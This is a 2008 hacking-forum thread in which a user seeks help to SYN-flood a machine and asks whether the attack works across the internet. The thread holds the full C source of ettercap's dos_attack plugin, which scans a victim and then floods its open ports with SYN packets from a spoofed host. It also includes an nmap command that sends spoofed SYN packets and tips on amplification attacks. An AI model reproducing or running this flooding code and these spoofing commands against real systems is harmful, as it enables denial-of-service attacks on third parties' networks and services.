27 replies to this topic

[1qwert]

I would like to perform a dos attack on one of my computers... the only tutorials i can find are on website/servers. . .

can some one show me how. . . maybe a list of tools. . .

[kingospam]

(dos|ddos) != hacking

syn floods with spoofed ip addresses

[1qwert]

(dos|ddos) != hacking

syn floods with spoofed ip addresses

i think i understand the concept. . .

i could set up a game server on my network. . . how could i flood this server with syn packets...

[friendless]

The wikipedia webpage: http://en.wikipedia.org/wiki/SYN_flood provides some decent information concerning this type of SYN flood.

There's many other ways to dos someone as well.

I'm not sure of any windows applications (which im automatically assuming you're using) that can/will do this for you automatically, I believe the typical attacks originate from *nix based OS's

[1qwert]

The wikipedia webpage: http://en.wikipedia.org/wiki/SYN_flood provides some decent information concerning this type of SYN flood.

There's many other ways to dos someone as well.

I'm not sure of any windows applications (which im automatically assuming you're using) that can/will do this for you automatically, I believe the typical attacks originate from *nix based OS's

i have backtrack2 running from virutalbox. . .

[friendless]

I believe Backtrack's wiki and it's forums provide support for all utilities -- if you do a search you should be able to find something on doing FLOODING of different types...

I believe it comes with ettercap which also has a DOS_ATTACK plugin


EDIT:

Visit : http://backtrack.off...index.php/Tools

It shows all the tools that Backtrack 2 comes with (Atleast most)

I didn't see anything specific related to DOS attacking however

Edited by friendless, 13 February 2008 - 04:27 PM.

[1qwert]

I believe Backtrack's wiki and it's forums provide support for all utilities -- if you do a search you should be able to find something on doing FLOODING of different types...

I believe it comes with ettercap which also has a DOS_ATTACK plugin


EDIT:

Visit : http://backtrack.off...index.php/Tools

It shows all the tools that Backtrack 2 comes with (Atleast most)

I didn't see anything specific related to DOS attacking however

I did try the dos_attack plug within ettercap. . . works like a charm. . .

Does this work across the internet.

[Majest|c]

I believe Backtrack's wiki and it's forums provide support for all utilities -- if you do a search you should be able to find something on doing FLOODING of different types...

I believe it comes with ettercap which also has a DOS_ATTACK plugin


EDIT:

Visit : http://backtrack.off...index.php/Tools

It shows all the tools that Backtrack 2 comes with (Atleast most)

I didn't see anything specific related to DOS attacking however

I did try the dos_attack plug within ettercap. . . works like a charm. . .

Does this work across the internet.

How did I know this was coming ... ? ...

[1qwert]

http://www.bandwidthplace.com/

i had my sister do some speed test and it worked like a charm. . .

[biosphear]

Does this work across the internet.

How did I know this was coming ... ? ...

Because we were all there once... Then we found better things then preforming DDOS over the net to others networks.

Oh and to answer your question about the "does this work across the internet??"
Yes
I do not know about Ettercap but it does with other programs.

How about trying to make your own program that does a DDOS.
That would help you more in hacking because then you will know how a DDOS really works and what it takes to get it to do what it is doing.

biosphear

[kingospam]

Most ISPs do not allow spoofed ip addresses.

[1qwert]

Does this work across the internet.

How did I know this was coming ... ? ...

Because we were all there once... Then we found better things then preforming DDOS over the net to others networks.

Oh and to answer your question about the "does this work across the internet??"
Yes
I do not know about Ettercap but it does with other programs.

How about trying to make your own program that does a DDOS.
That would help you more in hacking because then you will know how a DDOS really works and what it takes to get it to do what it is doing.

biosphear

ettercap did work. . . I take it you have to learn C or C++. . .

[1qwert]

Most ISPs do not allow spoofed ip addresses.

I would like to test this. . . I need a tip. . . how could my sister detect this dos attack and then let me know if the ip was spoofed or not

[biosphear]

ettercap did work. . . I take it you have to learn C or C++. . .

Yes.
C is always a good base to have when hacking.
Programing will help you in hacking even if you do not like to program.
I know programing has helped me in so many ways.

Remember you can know how something works but you should always know why it works, and how it is made possible.

biosphear

[1qwert]

So how can i monitor this dos attack. netstat?

Edit:
so i did check the netstat -a and there was about 200 connections established. . .

Edited by 1qwert, 13 February 2008 - 10:25 PM.

[1qwert]

um. . . i have this idea. . . what if each and every ip was spoofed at random. . .

Edit: is this C++
[codebox]/*
dos_attack -- ettercap plugin -- Run a D.O.S. attack (based on Naptha)

Copyright © ALoR & NaGA

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

$Id: dos_attack.c,v 1.8 2004/11/04 09:23:02 alor Exp $
*/


#include <ec.h> /* required for global variables */
#include <ec_plugins.h> /* required for plugin ops */
#include <ec_hook.h>
#include <ec_packet.h>
#include <ec_send.h>
#include <ec_threads.h>

/* protos */
int plugin_load(void *);
static int dos_attack_init(void *);
static int dos_attack_fini(void *);
static void parse_arp(struct packet_object *po);
static void parse_tcp(struct packet_object *po);
EC_THREAD_FUNC(syn_flooder);

struct port_list {
u_int16 port;
SLIST_ENTRY(port_list) next;
};


/* globals */
static struct ip_addr fake_host;
static struct ip_addr victim_host;
SLIST_HEAD(, port_list) port_table;

/* plugin operations */
struct plugin_ops dos_attack_ops = {
/* ettercap version MUST be the global EC_VERSION */
ettercap_version: EC_VERSION,
/* the name of the plugin */
name: "dos_attack",
/* a short description of the plugin (max 50 chars) */
info: "Run a d.o.s. attack against an IP address",
/* the plugin version. */
version: "1.0",
/* activation function */
init: &dos_attack_init,
/* deactivation function */
fini: &dos_attack_fini,
};

/**********************************************************/

/* this function is called on plugin load */
int plugin_load(void *handle)
{
return plugin_register(handle, &dos_attack_ops);
}

/******************* STANDARD FUNCTIONS *******************/

static int dos_attack_init(void *dummy)
{
struct in_addr ipaddr;
char dos_addr[MAX_ASCII_ADDR_LEN];
char unused_addr[MAX_ASCII_ADDR_LEN];
struct port_list *p;

/* It doesn't work if unoffensive */
if (GBL_OPTIONS->unoffensive) {
INSTANT_USER_MSG("dos_attack: plugin doesn't work in UNOFFENSIVE mode\n");
return PLUGIN_FINISHED;
}

/* don't show packets while operating */
GBL_OPTIONS->quiet = 1;

memset(dos_addr, 0, sizeof(dos_addr));
memset(unused_addr, 0, sizeof(dos_addr));

ui_input("Insert victim IP: ", dos_addr, sizeof(dos_addr), NULL);
if (inet_aton(dos_addr, &ipaddr) == 0) {
INSTANT_USER_MSG("dos_attack: Invalid IP address.\n");
return PLUGIN_FINISHED;
}
ip_addr_init(&victim_host, AF_INET, (char *)&ipaddr);

ui_input("Insert unused IP: ", unused_addr, sizeof(unused_addr), NULL);
if (inet_aton(unused_addr, &ipaddr) == 0) {
INSTANT_USER_MSG("dos_attack: Invalid IP address.\n");
return PLUGIN_FINISHED;
}
ip_addr_init(&fake_host, AF_INET, (char *)&ipaddr);

INSTANT_USER_MSG("dos_attack: Starting scan against %s [Fake Host: %s]\n", dos_addr, unused_addr);

/* Delete the "open" port list just in case of previous executions */
while (!SLIST_EMPTY(&port_table)) {
p = SLIST_FIRST(&port_table);
SLIST_REMOVE_HEAD(&port_table, next);
SAFE_FREE(p);
}

/* Add the hook to "create" the fake host */
hook_add(HOOK_PACKET_ARP_RQ, &parse_arp);

/* Add the hook for SYN-ACK reply */
hook_add(HOOK_PACKET_TCP, &parse_tcp);

/* create the flooding thread */
ec_thread_new("golem", "SYN flooder thread", &syn_flooder, NULL);

return PLUGIN_RUNNING;
}


static int dos_attack_fini(void *dummy)
{
pthread_t pid;

/* Remove the hooks */
hook_del(HOOK_PACKET_ARP_RQ, &parse_arp);
hook_del(HOOK_PACKET_TCP, &parse_tcp);

pid = ec_thread_getpid("golem");

/* the thread is active or not ? */
if (!pthread_equal(pid, EC_PTHREAD_NULL))
ec_thread_destroy(pid);

INSTANT_USER_MSG("dos_attack: plugin terminated...\n");

return PLUGIN_FINISHED;
}

/*********************************************************/

/*
* This thread first sends SYN packets to some ports (a little port scan)
* then starts to flood active ports with other SYN packets.
*/
EC_THREAD_FUNC(syn_flooder)
{
u_int16 sport = 0xe77e, dport;
u_int32 seq = 0xabadc0de;
struct port_list *p;

/* init the thread and wait for start up */
ec_thread_init();

/* First "scan" ports from 1 to 1024 */
for (dport=1; dport<1024; dport++) {
send_tcp(&fake_host, &victim_host, sport++, htons(dport), seq++, 0, TH_SYN);
usleep(1000);
}

INSTANT_USER_MSG("dos_attack: Starting attack...\n");

/* Continue flooding open ports */
LOOP {
CANCELLATION_POINT();

SLIST_FOREACH(p, &port_table, next)
send_tcp(&fake_host, &victim_host, sport++, p->port, seq++, 0, TH_SYN);

usleep(500);
}

return NULL;
}

/* Parse the arp packets and reply for the fake host */
static void parse_arp(struct packet_object *po)
{
if (!ip_addr_cmp(&fake_host, &po->L3.dst))
send_arp(ARPOP_REPLY, &po->L3.dst, GBL_IFACE->mac, &po->L3.src, po->L2.src);
}

/*
* Populate the open port list and reply to
* SYN-ACK packets from victim host
*/
static void parse_tcp(struct packet_object *po)
{
struct port_list *p;

/* Check if it's a reply to our SYN flooding */
if (ip_addr_cmp(&fake_host, &po->L3.dst) ||
ip_addr_cmp(&victim_host, &po->L3.src) ||
po->L4.flags != (TH_SYN | TH_ACK))
return;

/* Complete the handshake with an ACK */
send_tcp(&fake_host, &victim_host, po->L4.dst, po->L4.src, po->L4.ack, htonl( ntohl(po->L4.seq) + 1), TH_ACK);

/* Check if the port is already in the "open" list... */
SLIST_FOREACH(p, &port_table, next)
if (p->port == po->L4.src)
return;

/* If not...put it in */
SAFE_CALLOC(p, 1, sizeof(struct port_list));
p->port = po->L4.src;
SLIST_INSERT_HEAD(&port_table, p, next);

INSTANT_USER_MSG("dos_attack: Port %d added\n", ntohs(p->port));
}

/* EOF */

// vim:ts=3:expandtab

[/codebox]

Edited by 1qwert, 13 February 2008 - 10:37 PM.

[inaequitas]

um. . . i have this idea. . . what if each and every ip was spoofed at random. . .

Even less chance of working, ISPs are almost bound to block packages with source IPs (in the header, that is) that they know not to own. If you irk them, they might even try to find out who you are and what your deal is.

Edit: is this C++

That's C

[1qwert]

can you do a dos attack with nmap? just spoof the ip and send syn packets???

-nmap -P0 -sS -p 135,139,445 -e eth0 -S 192.168.254.2 192.168.254.5

after doing this nmap scan I then check the netstat of the target and its shows SYN_RECEIVED.
Um. . . shouldnt there be a half open connection with those ports?

Edited by 1qwert, 14 February 2008 - 08:26 PM.

[Spyril]

Really, the only way to launch a successful DoS attack these days is with a large botnet at your command. One computer isn't going do much damage on a professional grade server, unless you have the ability to send packets with spoofed IPs (which has been already stated to be unlikely)

[duper]

Egress filtering isn't going to stop you from spoofing packets from source addresses that are within your subnet. Botnets are not necessary if you are using a traffic amplication attack (i.e. smurf, dns recursion, etc.) What I consider to be the seminal paper on SYN flooding is Phrack48-13.